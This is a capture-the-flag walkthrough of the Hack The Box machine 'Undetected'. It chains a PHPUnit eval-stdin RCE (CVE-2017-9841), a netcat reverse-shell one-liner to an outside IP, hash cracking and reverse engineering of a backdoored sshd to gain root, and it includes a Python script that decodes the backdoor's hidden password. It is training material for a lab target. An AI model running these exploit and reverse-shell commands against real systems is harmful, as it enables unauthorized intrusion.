
Undetected HTB Walkthrough

Machine Info

  • OS: Linux
  • Difficulty: Medium
  • Points: 30
  • Release: 19 Feb 2022
  • IP: 10.10.11.146

Network Scanning

nmap finds three open ports: ssh on 22, http on 80 and http on 5678.

nmap -p- -T4 -A 10.10.11.146


Enumeration

The website reveals a subdomain “store.djewelry.htb”, so we add it to “/etc/hosts” and check it.


Nothing of interest at “store.djewelry.htb”. We run gobuster to find other interesting directories or files, and it finds a directory “vendor” that looks promising.

gobuster dir -u http://store.djewelry.htb/ -w /usr/share/wordlists/dirb/common.txt


Checking the “vendor” directory, we find a directory called “phpunit”; its files indicate version 5.6, which is vulnerable to RCE (CVE-2017-9841).


Exploitation

We apply the exploit to check whether our target is actually vulnerable, and it is.

curl -X POST --proxy 127.0.0.1:8080 http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -d "<?=phpinfo()?>" -s


Now let’s get a reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f


Privilege Escalation

User Steven

While enumerating system files, we find an executable called “info” in a backup directory. Let’s copy that file to our machine for investigation.


Using the strings command, we get a hex string that may be useful.

strings info


Decoding that hex gives text containing a password hash. We crack the hash with john and get the password “ihatehackers”.

echo <hex format> | xxd -r -p
echo '$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash


Looking at “/etc/passwd” to list the system users, we find two users, “steven” and “steven1”. We try the password we recovered, and it works for “steven1”. That also gives us the user flag.

tail /etc/passwd
su steven
su steven1


Root

After logging in as steven, we run linpeas and find an email from root to steven describing strange behaviour of the apache service. So we check the /lib/apache2/modules directory and find “mod_reader.so”, which has a newer modification date than the other modules.

./linpeas.sh
cd /var/mail
cat steven
cd /lib/apache2/modules
ls -l


We copy “mod_reader.so” to our local machine for investigation. Using strings again, we find a base64 string. Decoding it, we notice something suspicious involving sshd, so we copy sshd as well to analyze it locally.

strings mod_reader.so
echo <base64 format> | base64 -d


We open sshd in Ghidra and spend a lot of time looking for anything suspicious. The machine is called “Undetected”, so maybe that refers to an undetected backdoor. We search for “backdoor” and find a function called “auth_password” that contains a backdoor array.


That backdoor array contains hex values, but we need to put them in the right order. Note that the first value of the backdoor is assigned in negative form, “-0x5b”, which is not a valid byte value on its own; from the assembly, its unsigned value is “0xa5”. We also notice an XOR with “0x96” inside the while loop.


Then we use CyberChef with the operations Swap endianness, From Hex and XOR (key 0x96).
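The same recovery can be scripted, as an added example that is not part of the original post: the constants below are constructed from a made-up string, not the machine’s real value; only the 0x96 key and the “-0x5b is really 0xa5” case come from the analysis above. Each assignment is modelled as (offset, width, constant) the way the decompiler prints it, so a negative constant is masked back to its unsigned bytes and multi-byte constants are written little-endian, which is what the Swap endianness step does in CyberChef.

```python
# Constructed example: rebuild and decode an XOR-obfuscated buffer that a
# decompiler shows as a list of signed constants (as in auth_password).
XOR_KEY = 0x96  # the constant XORed in the while loop


def to_signed(value, width):
    """Print an unsigned constant the way a decompiler does (two's complement)."""
    bits = 8 * width
    return value - (1 << bits) if value >= 1 << (bits - 1) else value


def rebuild_buffer(assignments, length):
    """assignments: (byte offset, width in bytes, constant as printed).
    A negative constant such as -0x5b is the byte 0xa5; multi-byte constants
    were stored little-endian, which is what 'swap endianness' undoes."""
    buf = bytearray(length)
    for offset, width, value in assignments:
        mask = (1 << (8 * width)) - 1
        buf[offset:offset + width] = (value & mask).to_bytes(width, "little")
    return bytes(buf)


def decode_backdoor(assignments, length, key=XOR_KEY):
    """Undo the XOR on the rebuilt buffer and return the hidden string."""
    raw = rebuild_buffer(assignments, length)
    return bytes(b ^ key for b in raw).decode("ascii")


def as_decompiler_constants(plaintext, key=XOR_KEY):
    """Constructed helper for the demo: encode a string and split it into the
    one-byte-then-eight-byte signed constants a decompiler would print."""
    enc = bytes(b ^ key for b in plaintext.encode("ascii"))
    assignments = [(0, 1, to_signed(enc[0], 1))]
    for off in range(1, len(enc), 8):
        chunk = enc[off:off + 8]
        value = int.from_bytes(chunk, "little")
        assignments.append((off, len(chunk), to_signed(value, len(chunk))))
    return assignments


if __name__ == "__main__":
    sample = "3xampl3-0nly"  # constructed, not the machine's real value
    consts = as_decompiler_constants(sample)
    print(consts)  # first entry is (0, 1, -0x5b): '3' (0x33) ^ 0x96 = 0xa5
    print(decode_backdoor(consts, len(sample)))
```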


Using the CyberChef result as the root password works.

ssh root@10.10.11.146
cat root.txt


This post is licensed under CC BY 4.0 by the author.